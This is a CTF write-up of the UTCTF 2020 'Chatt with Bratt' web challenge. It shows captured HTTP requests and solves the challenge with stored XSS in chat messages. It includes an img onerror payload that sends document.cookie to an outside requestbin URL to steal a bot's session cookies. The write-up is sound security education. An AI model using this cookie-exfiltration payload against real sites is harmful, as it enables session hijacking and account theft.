Solving Chatt with Bratt from UTCTF 2020

Posted on Mon 09 March 2020 in CTF by 0xm4v3rick


The CTF challenge note:

1
2
3
4
5
6
After announcing that he would be having an anonymous 1-on-1 AMA with randomly chosen, adoring fans, an engineering team hacked together a web app and likely forget to patch some obvious security holes.   
Anyway, you're one of the lucky fans chosen to chatt with Bratt Pid!

Have fun: web3.utctf.live:8080

by phleisch

A chatting web app was the target this time which looked like below.

auth

Sending any message generated request like below

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
POST /chatt HTTP/1.1
Host: web3.utctf.live:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web3.utctf.live:8080/chatt
Content-Type: text/plain;charset=UTF-8
Origin: http://web3.utctf.live:8080
Content-Length: 18
Connection: close
Cookie: chat_id=4325eda0-6143-11ea-90ec-d22523ec0ff6; secret=none

{"content":"test"}

And messages were retrieved time to time by below request.

Request:

1
2
3
4
5
6
7
8
9
GET /messages HTTP/1.1
Host: web3.utctf.live:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web3.utctf.live:8080/chatt
Connection: close
Cookie: chat_id=4325eda0-6143-11ea-90ec-d22523ec0ff6; secret=none

Response:

1
2
3
4
5
6
7
HTTP/1.1 200 OK
Content-Type: application/json
Date: Sun, 08 Mar 2020 13:47:11 GMT
Content-Length: 128
Connection: Close

{"Messages":[{"Chat_ID":"4325eda0-6143-11ea-90ec-d22523ec0ff6","Content":"test","Msg_Sent":"2020-03-08T13:46:55Z","User_ID":1}]}

Only a few attack scenarios looked viable which included XSS or SSRF. There were no protections against XSS whatsoever so I went on to check if I could pop an alert with cookies in it with following payload as a chat message. The payload will fire when there is an error to get the image using src since its not available at location x

1
<img src=x onerror=this.src=alert(document.cookie);>

That gave us the alert with cookies in it. So the next step was to retrieve cookies of Bratt to see if it has anything of use. Payload used was a below. I used requestbin to capture the cookies. The payload appends cookie value to the parameter a and sends it to our requestbin.

1
<img src=x onerror=this.src='https://enz6vefoyu8n.x.pipedream.net/leak?a='+document.cookie;>

That worked and it landed us the flag. As simple as it gets.

auth

Thanks to UTCTF Team for the chall. Feel free to contact me on twitter for queries or feedback. Cheers!!